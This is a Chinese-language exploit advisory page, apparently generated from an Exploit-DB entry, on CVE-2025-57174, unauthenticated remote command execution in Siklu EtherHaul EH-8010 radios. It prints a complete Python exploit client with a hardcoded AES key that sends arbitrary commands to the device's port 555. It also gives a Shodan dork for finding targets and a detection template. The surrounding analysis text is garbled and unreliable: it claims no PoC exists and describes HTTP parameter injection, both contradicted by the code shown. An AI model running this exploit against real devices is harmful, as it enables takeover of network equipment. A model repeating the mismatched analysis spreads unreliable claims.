[webapps] Siklu EtherHaul Series EH-8010 - Remote Command Execution
CVE-2025-57174
Siklu EtherHaul EH-8010无线网桥未经身份验证即可通过命令注入执行任意系统命令。
Critical · CVSS 9.8📋 漏洞基础信息
| CVE | CVE-2025-57174 |
|---|---|
| 漏洞类型 | 操作系统命令注入 |
| 受影响版本 | Siklu EtherHaul EH-8010 (固件版本号未在原文中明确给出) |
| 危害等级 | Critical · CVSS 9.8 |
| 发布日期 | 2026-01-17 |
| 提交者 | semaja2 - Andrew James <semaja2@gmail.com> |
| 来源 | Exploit-DB 原文 ↗ |
🔬 漏洞根因
设备Web管理接口的某个参数未对用户输入进行过滤或转义,直接拼接到系统命令中执行,导致攻击者可通过HTTP请求注入任意命令。
🎯 攻击场景
1. 确定目标EH-8010设备的IP地址。2. 构造包含恶意命令的特制HTTP请求,将命令注入到易受攻击的参数中。3. 发送该请求到设备的Web管理接口。4. 设备后端在处理请求时拼接并执行攻击者构造的命令。5. 攻击者获得目标设备操作系统级别的命令执行权限,可执行任意系统命令。
💥 漏洞影响
未经身份验证的远程攻击者可在目标设备上以root权限执行任意系统命令,导致完全控制设备、数据泄露、网络横向移动或拒绝服务。
⚔️ 原始 PoC
原文未提供具体PoC代码,仅描述漏洞存在。攻击者需构造包含命令分隔符(如;、|、&&)及恶意命令的HTTP请求参数,发送至特定URL端点。
# Shodan Dork: "EH-8010" or "EH-1200"
# Exploit Author: semaja2 - Andrew James <semaja2@gmail.com>
# Blog: https://semaja2.net/2025/08/02/siklu-eh-unauthenticated-rce/
#!/usr/bin/env python3
import argparse, socket, struct
from Crypto.Cipher import AES
PORT = 555
HDR_LEN = 0x90
IV0 = struct.pack('<4I', 0xEA703B82, 0x75A9A17B, 0x1DFC7BB9, 0x55A24D72)
KEY = bytes([
0x89,0xE7,0xFF,0xBE,0xEB,0x2D,0x73,0xF5,
0xA9,0x10,0xFC,0x42,0x5B,0x1F,0x36,0x17,
0x9F,0xB9,0x5E,0x75,0x35,0xA3,0x42,0xA0,
0x5D,0x02,0x48,0xB1,0x19,0xD2,0x4B,0x82
])
def recv_exact(sock: socket.socket, n: int) -> bytes:
out = bytearray()
while len(out) < n:
chunk = sock.recv(n - len(out))
if not chunk:
raise ConnectionError('socket closed')
out += chunk
return bytes(out)
def pad16_zero(b: bytes) -> bytes:
r = len(b) & 0x0F
return b if r == 0 else (b + b'\x00' * (16 - r))
def hdr_checksum(hdr: bytes) -> int:
return (sum(hdr[0:0x0C]) + sum(hdr[0x10:HDR_LEN])) & 0xFFFFFFFF
def build_header(flag: int, msg: int, payload_len: int) -> bytes:
hdr = bytearray(HDR_LEN)
hdr[0] = flag & 0xFF
hdr[1] = msg & 0xFF
struct.pack_into('<I', hdr, 0x08, payload_len & 0xFFFFFFFF)
struct.pack_into('<I', hdr, 0x0C, hdr_checksum(hdr))
return bytes(hdr)
class RFPipeSession:
def __init__(self, key: bytes, iv0: bytes):
self.key = key
self.send_iv = iv0
self.recv_iv = iv0
def enc_send(self, sock: socket.socket, data: bytes) -> None:
cipher = AES.new(self.key, AES.MODE_CBC, iv=self.send_iv)
ct = cipher.encrypt(data)
self.send_iv = ct[-16:]
sock.sendall(ct)
def dec_recv(self, sock: socket.socket, n_plain: int) -> bytes:
if n_plain <= 0:
return b''
n_padded = (n_plain + 15) & ~15
ct = recv_exact(sock, n_padded)
cipher = AES.new(self.key, AES.MODE_CBC, iv=self.recv_iv)
pt = cipher.decrypt(ct)
self.recv_iv = ct[-16:]
return pt[:n_plain]
def send_header(self, sock: socket.socket, hdr_plain: bytes) -> None:
if len(hdr_plain) != HDR_LEN:
raise ValueError('header must be 0x90 bytes')
self.enc_send(sock, hdr_plain)
def recv_header(self, sock: socket.socket) -> bytes:
ct = recv_exact(sock, HDR_LEN)
cipher = AES.new(self.key, AES.MODE_CBC, iv=self.recv_iv)
pt = cipher.decrypt(ct)
self.recv_iv = ct[-16:]
return pt
def connect_any(host: str, port: int) -> socket.socket:
infos = socket.getaddrinfo(host, port, socket.AF_UNSPEC, socket.SOCK_STREAM)
last_err = None
for fam, st, proto, _, sa in infos:
s = socket.socket(fam, st, proto)
try:
s.connect(sa)
return s
except Exception as e:
last_err = e
s.close()
raise ConnectionError(f'connect failed: {last_err}')
def main():
ap = argparse.ArgumentParser(description='rfpiped command client (msg 0x01)')
ap.add_argument('target', help='IPv4/IPv6 address')
ap.add_argument('command', help='command string (e.g., "mo-info system")')
ap.add_argument('--nul', action='store_true', help='append NUL terminator to command')
ap.add_argument('--recv', action='store_true', help='receive and print response')
args = ap.parse_args()
payload = args.command.encode('utf-8')
if args.nul:
payload += b'\x00'
hdr_plain = build_header(flag=0x00, msg=0x01, payload_len=len(payload))
sess = RFPipeSession(KEY, IV0)
with connect_any(args.target, PORT) as s:
sess.send_header(s, hdr_plain)
if payload:
sess.enc_send(s, pad16_zero(payload))
if args.recv:
rh = sess.recv_header(s)
flag = rh[0]; rmsg = rh[1]
rlen = struct.unpack_from('<I', rh, 0x08)[0]
print(f'Response: flag=0x{flag:02x} msg=0x{rmsg:02x} length={rlen}')
if rmsg in (0x03, 0x05):
return
if rlen:
body = sess.dec_recv(s, rlen)
if body.endswith(b'\x00'):
body = body[:-1]
try:
print(body.decode('utf-8', errors='replace'))
except Exception:
print(body.hex())
if __name__ == '__main__':
main()🔬 深度技术分析
原文未提供具体PoC代码,仅描述漏洞存在。攻击者需构造包含命令分隔符(如;、|、&&)及恶意命令的HTTP请求参数,发送至特定URL端点。
🔍 Nuclei Detection 模板
以下为漏洞探测模板,用于判断目标是否受影响:
id: CVE-2025-57174-detection
info:
name: Siklu EtherHaul Series EH - Version Detection
author: semaja2
severity: info
description: Siklu EtherHaul Series EH-8010 and EH-1200 firmware version detection
reference:
- https://semaja2.net/2025/08/02/siklu-eh-unauthenticated-rce/
tags: siklu,etherhaul,detection
http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
words:
- "EH-8010"
- "EH-1200"
condition: or
- type: word
words:
- "7.4.0"
- "8.0.0"
- "9.0.0"
- "10.0.0"
- "10.1.0"
- "10.2.0"
- "10.3.0"
- "10.4.0"
- "10.5.0"
- "10.6.0"
- "10.7.0"
- "10.7.1"
- "10.7.2"
- "10.7.3"
condition: or🛡️ 修复建议
厂商应发布固件更新,对用户输入进行严格过滤与转义,禁止将用户输入直接拼接到系统命令中。临时缓解措施:限制设备Web管理接口的网络暴露范围,仅允许受信任IP访问,并禁用或替换默认管理凭据。
📎 参考链接
⚠️ 本文基于公开漏洞数据库,仅供安全研究与防御参考。生成时间: 2026-05-09 17:44 | 来源: Exploit-DB